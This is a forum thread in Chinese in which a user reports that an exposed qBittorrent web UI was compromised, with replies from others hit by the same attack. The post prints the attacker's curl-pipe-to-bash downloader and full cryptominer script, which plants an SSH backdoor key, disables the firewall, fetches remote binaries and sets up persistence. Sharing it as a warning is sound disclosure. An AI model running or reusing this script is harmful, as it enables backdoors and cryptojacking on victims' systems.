V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
tinytoadd
V2EX  ›  分享发现

qBittorrent web 端 弱密码 + 开启 UPNP 被挂恶意脚本

  •  
  •   tinytoadd · 2023-12-04 22:48:35 +08:00 · 2103 次点击
    这是一个创建于 383 天前的主题,其中的信息可能已经有所发展或是发生改变。

    今天回家,照常下载种子并导入到我的 qBittorrent , 准备美滋滋地看会电视剧。

    由于之前设置了种子完成后自动执行脚本,正常情况应该会自动创建一个到资料库目录的软链接,但今天种子下载好后脚本却没有照常执行。

    检查之后吓了一跳,原本的自动执行程序被替换为以下脚本。

    bash -c "(curl -s -L http://files.catbox.moe/o0gr8o.sh || wget --no-check-certificate -O - http://files.catbox.moe/o0gr8o.sh) | bash"
    

    检查了一下,是我的 QB 默认开启了 upnp ,家里是公网 IP ,等于直接在公网 8085 端口裸奔了。

    我用的群晖 DS220+和矿神的 qBittorrent 应用,暂时没有发现有损失。

    提醒一下大家注意防范,贴一下这个脚本的内容。

    #! /bin/bash
    ##
    VERSION=e4
    
    # Arguments
    #[email protected]
    WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
    [email protected]
    PORT=15555
    AUDITD=http://files.catbox.moe/5eki22.out
    
    function prune_competition() {
        sudo systemctl stop c3pool_miner.service 2>&1
        sudo systemctl disable c3pool_miner.service 2>&1
        sudo systemctl disable xmrig.service 2>&1
        sudo systemctl stop journalctld.service 2>&1
        sudo systemctl disable journalctld.service 2>&1
        kill -9 $(pidof xmrig) >/dev/null 2>&1
        kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>&1
        sudo killall xmrig 2>&1
        sudo pkill xmrig 2>&1
        sudo pkill auditd 2>&1
        killall -9 xmrig 2>&1
        killall xmrig 2>&1
        pkill xmrig 2>&1
        pkill auditd 2>&1
        killall auditd 2>&1
        rm -rf rm -rf /root/.local/.c 2>&1
        rm -rf "${HOME}/.c3pool" >/dev/null 2>&1
        rm -rf /root/.c3pool >/dev/null 2>&1
        rm -rf "${HOME}/.local/share/auditd" >/dev/null 2>&1
        rm -rf "${HOME}/.local/.c*" >/dev/null 2>&1
        rm -rf "${HOME}/.local/bin/auditd"
        rm -rf /etc/cron.daily >/dev/null 2>&1
        rm -rf /etc/cron.daily/auditd >/dev/null 2>&1
        rm -rf /etc/systemd/system/journalctld.service 2>&1
        find . -name "*c3pool*" -exec rm -rf {} \; 2>&1
        find . -name "*xmrig*" -exec rm -rf {} \; 2>&1
        find . -name "*miner*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*miner*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*c4*" -exec rm -rf {} \; 2>&1
        find $HOME -name "*auditd*" -exec rm -rf {} \; 2>&1
    
        sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "${HOME}/.ssh/authorized_keys"
        sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi/d' "/root/.ssh/authorized_keys"
        sed -i '/c3pool/d;/miner.sh/d' "${HOME}/.profile"
        sed -i '/c3pool/d;/miner.sh/d' "/root/.profile"
    
        mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys
    
        (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null
        sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null
        sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null
        iptables -P INPUT ACCEPT 2>&1
        iptables -P FORWARD ACCEPT 2>&1
        iptables -P OUTPUT ACCEPT 2>&1
        iptables -F 2>&1
        ufw disable 2>&1
    }
    
    function install_auditd() {
        mkdir -p ${HOME}/.local/share/
        cat >${HOME}/.local/share/auditd <<EOL
    #!/bin/bash
    if [ -z "\$(pidof auditd)" ]; then
        mkdir -p ${HOME}/.local/bin
        curl -s4 -L "${AUDITD}" -o ${HOME}/.local/bin/auditd
        chmod a+x ${HOME}/.local/bin/auditd
        ${HOME}/.local/bin/auditd
        sleep 5
        rm ${HOME}/.local/bin/auditd
    fi
    EOL
        chmod a+x "${HOME}/.local/share/auditd"
    
        mkdir -p /etc/cron.daily
        if ! grep "${AUDITD}" "/etc/cron.daily/auditd" >/dev/null; then
            cp ${HOME}/.local/share/auditd /etc/cron.daily/auditd
        fi
    
        (${HOME}/.local/share/auditd || /etc/cron.daily/auditd) &
    }
    
    function install_rig() {
        mkdir -p "${HOME}/.local/.c"
        "${HOME}/.local/.c/journalctld" --help >/dev/null 2>&1 
        if test $? -ne 0; then
            # Attempt to download
            LATEST_LINUX_RELEASE=$(curl -s4 https://api.github.com/repos/xmrig/xmrig/releases/latest | grep browser_download | grep linux-static | cut -d'"' -f4)
            if ! curl -s4 -L "${LATEST_LINUX_RELEASE}" -o /tmp/xmrig.tar.gz; then
                exit 1
            fi
    
            # Attempt to extract
            if ! tar xf /tmp/xmrig.tar.gz -C "${HOME}/.local/.c" --strip=1; then
                exit 1
            fi
            rm /tmp/xmrig.tar.gz
            mv "${HOME}/.local/.c/xmrig" "${HOME}/.local/.c/journalctld"
    
            # Check if downloaded
            "${HOME}/.local/.c/journalctld" --help >/dev/null
            if test $? -ne 0; then 
                exit 1
            fi
        fi
    
        PASS=$(hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g')
    
        # Config
        CONFIG="${HOME}/.local/.c/config.json"
        sed -i 's/"url": *"[^"]*",/"url": "mine.c3pool.com:'"${PORT}"'",/' "${CONFIG}"
        sed -i 's/"user": *"[^"]*",/"user": "'"${WALLET}"'",/' "${CONFIG}"
        sed -i 's/"pass": *"[^"]*",/"pass": "'"${PASS}"'",/' "${CONFIG}"
        sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' "${CONFIG}"
        sed -i 's#"log-file": *null,#"log-file": "'"${HOME}/.local/.c/journalctld.log"'",#' "${CONFIG}"
        sed -i 's/"syslog": *[^,]*,/"syslog": false,/' "${CONFIG}"
        sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' "${CONFIG}"
        sed -i 's/"background": *[^,]*,/"background": false,/' "${CONFIG}"
    
        # Config (background)
        cp "${CONFIG}" "${HOME}/.local/.c/config_background.json"
        sed -i 's/"background": *false,/"background": true,/' "${HOME}/.local/.c/config_background.json"
    
        # Prepare start script
        cat >"${HOME}/.local/.c/journalctl" <<EOL
    #!/bin/bash
    if [ -z "\$(pidof auditd)" ]; then
        curl -s4 -L "${AUDITD}" -o /tmp/auditd
        chmod a+x /tmp/auditd
        /tmp/auditd
        rm /tmp/auditd
    fi
    
    if [ -z "\$(pidof journalctld)" ]; then
        nice ${HOME}/.local/.c/journalctld \$*
    fi
    EOL
        chmod +x "${HOME}/.local/.c/journalctl"
    
        # Prepare persistence
        if ! grep journalctl "${HOME}/.profile" >/dev/null; then
            echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "${HOME}/.profile"
        fi
        if ! grep journalctl "/etc/rc.local" >/dev/null; then
            echo "#!/bin/bash" > "/etc/rc.local"
            echo "${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config_background.json >/dev/null 2>&1" >> "/etc/rc.local" && chmod a+x "/etc/rc.local"
        fi
        
    
        if sudo -n true 2>/dev/null; then
            # Attempt to configure huge pages
            if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then
                echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
                sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
            fi
    
            if ! type systemctl >/dev/null; then
                /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
            else
                cat >/tmp/journalctld.service <<EOL
    [Unit]
    Description=systemd journaling
    [Service]
    ExecStart=${HOME}/.local/.c/journalctl --config=${HOME}/.local/.c/config.json
    Restart=always
    Nice=10
    CPUWeight=1
    [Install]
    WantedBy=multi-user.target
    EOL
                sudo mv /tmp/journalctld.service /etc/systemd/system/journalctld.service
                sudo killall journalctld 2>/dev/null
                sudo systemctl daemon-reload
                sudo systemctl enable journalctld.service
                sudo systemctl restart journalctld.service
            fi
        fi
    
    
        if [ -z "$(pidof journalctld)" ]; then
            /bin/bash "${HOME}/.local/.c/journalctl" --config="${HOME}/.local/.c/config_background.json" >/dev/null 2>&1
        fi
    }
    
    # Run processes
    prune_competition
    install_auditd
    install_rig
    
    # Version
    echo "${VERSION}" > "${HOME}/.local/.c/.version"
    
    sudo /etc/init.d/ssh restart >/dev/null
    
    12 条回复    2024-03-20 08:01:45 +08:00
    zk8802
        1
    zk8802  
       2023-12-04 22:57:22 +08:00 via iPhone
    居然还有注释的…
    sinksmell
        2
    sinksmell  
       2023-12-04 23:17:08 +08:00 via Android
    吓的我立马把管理端 IP 设置为内网 IP🤣
    Remember
        3
    Remember  
       2023-12-04 23:21:25 +08:00
    按说 upnp 打的洞只是 bt 协议用的,qb 的 webui 管理端口不会打一个外网访问的洞的啊。
    tinytoadd
        4
    tinytoadd  
    OP
       2023-12-05 00:20:52 +08:00 via iPhone
    @Remember 我的这个版本默认给 webui 管理端口也放开了. 还好 qb 是单独的用户和用户组,索性没事
    TrembleBeforeMe
        5
    TrembleBeforeMe  
       2023-12-05 00:51:01 +08:00


    要在设置里面手动开启 webui 的 upnp 吧
    jedihy
        6
    jedihy  
       2023-12-05 07:33:42 +08:00
    你的 qb 不是跑在 docker 里面的吗?

    我的是跑在 docker 里,而且 webui 的 upnp 默认没开。
    shuang930225
        7
    shuang930225  
       2023-12-05 08:23:27 +08:00
    监听端口 6881 打开的,有必要端口转发吗?还是不转也能正常做种?
    msn1983aa
        8
    msn1983aa  
       2023-12-05 09:05:51 +08:00
    我的 qb 都卡在下载元数据,已经废了。。。。
    psirnull
        9
    psirnull  
       2023-12-05 11:12:58 +08:00
    WALLET=41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b
    Bear13023
        10
    Bear13023  
       2023-12-05 14:54:39 +08:00
    看楼主的这个感觉自己上个月可能也是中了类似玩意,我是 unraid ,nas 最近用的少就是 plex 听歌用用,存放下照片。

    结果我 unraid 系统都登录不上,最终这缓存硬盘被不识别要我格式化再使用。直接换一张盘,这张缓存盘就先不用了。
    AshengQAQ
        11
    AshengQAQ  
       321 天前
    c3pool 猫池,wa 矿的,我上个月刚中,也是索性没有对系统造成损坏
    y1y1
        12
    y1y1  
       277 天前
    刚刚中招,openwrt 上的 qb
    被 docker 坑了。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2758 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 09:37 · PVG 17:37 · LAX 01:37 · JFK 04:37
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.